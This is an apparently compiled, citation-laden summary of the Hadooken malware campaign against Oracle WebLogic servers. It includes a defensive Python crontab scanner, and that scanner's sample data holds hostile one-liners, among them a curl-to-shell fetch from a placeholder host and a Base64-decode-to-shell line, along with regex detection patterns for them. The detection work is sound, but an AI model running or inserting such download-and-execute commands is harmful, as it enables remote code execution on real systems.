Cybersecurity researchers have uncovered a Linux malware campaign known as Hadooken, targeting misconfigured Oracle WebLogic servers [4].

Description

This campaign exploits deserialization flaws and weak credentials in exposed WebLogic servers to gain initial access. Attackers then deploy a backdoor called Hadooken [4], which bundles a cryptocurrency miner and a DDoS bot known as Tsunami. The malware is dropped into non-persistent directories such as /tmp and installs cron jobs for persistence. Its defense evasion includes Base64-encoded payloads and deletion of artifacts after execution [3].

The IP address associated with the campaign has been linked to previous cybercriminal groups [4], indicating a potential threat to both Windows and Linux systems [4]. The infrastructure is tied to Aeza International LTD and Aeza Group Ltd [3] [7], bulletproof hosting providers based in Moscow and Frankfurt [3] [7] that offer shelter to malicious actors [3]. Researchers who observed the attacks traced the malware's IP addresses to a UK hosting company registered in Germany and to a Russian IP address [2].

Hadooken grants attackers full control over compromised endpoints and carries traces of ransomware functionality [2]: static analysis of the binary revealed links to the RHOMBUS and NoEscape ransomware families [6], although dynamic analysis showed no active use of that code [6]. Attackers exploiting weak Oracle WebLogic servers have so far used Hadooken [2] [3] [5] [6] in a few dozen attacks for cryptocurrency mining and DDoS botnet activity [2]. Shodan search results indicate over 230K internet-connected WebLogic servers [6], some of which are exposed to attack because of vulnerabilities and misconfigurations [6].

Organizations are advised to use a range of security tooling to mitigate threats like Hadooken [5], including Infrastructure as Code scanning [1], Cloud Security Posture Management [1], Kubernetes security [1], container security [1], and runtime security monitoring [1]. Understanding how Hadooken operates and implementing proactive security measures are crucial for safeguarding critical systems against evolving cyber threats [1].
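The persistence and evasion traits described above (cron entries that run from non-persistent directories, Base64-decoded payloads piped to a shell, download-and-execute one-liners) can be turned into a simple triage check. The following is an added example, not code from any of the cited reports; the crontab lines it scans are constructed for illustration and the rule names are hypothetical labels.

```python
import re
from typing import Dict, List

# Constructed sample crontab content for illustration; not taken from the reports above.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.c/update.sh >/dev/null 2>&1
@reboot echo dGVzdA== | base64 -d | sh
15 2 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
* * * * * curl -s http://example.invalid/p | sh
"""

# Heuristics mapped to the reported Hadooken traits: execution from a
# non-persistent directory, a Base64-decoded payload piped into a shell,
# and a download piped straight into a shell. Rule names are hypothetical.
RULES = [
    ("nonpersistent_dir", re.compile(r"(^|[\s=])/(?:tmp|dev/shm|var/tmp)/")),
    ("base64_to_shell", re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b")),
    ("download_to_shell", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")),
]


def flag_cron_entries(crontab_text: str) -> List[Dict[str, object]]:
    """Return one finding per crontab line that matches at least one rule."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # comments and blank lines are never findings
        hits = [name for name, pattern in RULES if pattern.search(stripped)]
        if hits:
            findings.append({"line": lineno, "entry": stripped, "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in flag_cron_entries(SAMPLE_CRONTAB):
        print(f"line {finding['line']}: {', '.join(finding['rules'])}: {finding['entry']}")
```

In practice the function would be fed the output of `crontab -l` for each user and the contents of /etc/cron.d, and a hit is a prompt for manual review rather than proof of compromise.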

Conclusion

The Hadooken malware campaign highlights the importance of securing Oracle WebLogic servers to prevent further exploitation by cybercriminals [2]. Organizations must implement proactive security measures to mitigate threats and safeguard critical systems against evolving cyber threats.

References

[1] https://linuxsecurity.com/news/server-security/fighting-back-against-hadooken-malware
[2] https://www.techradar.com/pro/security/oracle-servers-targeted-by-new-linux-malware-to-steal-passwords-crypto
[3] https://thehackernews.com/2024/09/new-linux-malware-campaign-exploits.html
[4] https://www.csoonline.com/article/3520721/new-cryptomining-campaign-infects-weblogic-servers-with-hadooken-malware.html
[5] https://www.darkreading.com/cyberattacks-data-breaches/hadooken-malware-targets-weblogic-servers
[6] https://securityaffairs.com/168364/malware/hadooken-targets-oracle-weblogic-servers.html
[7] https://blog.netmanageit.com/hadooken-malware-targets-weblogic-applications/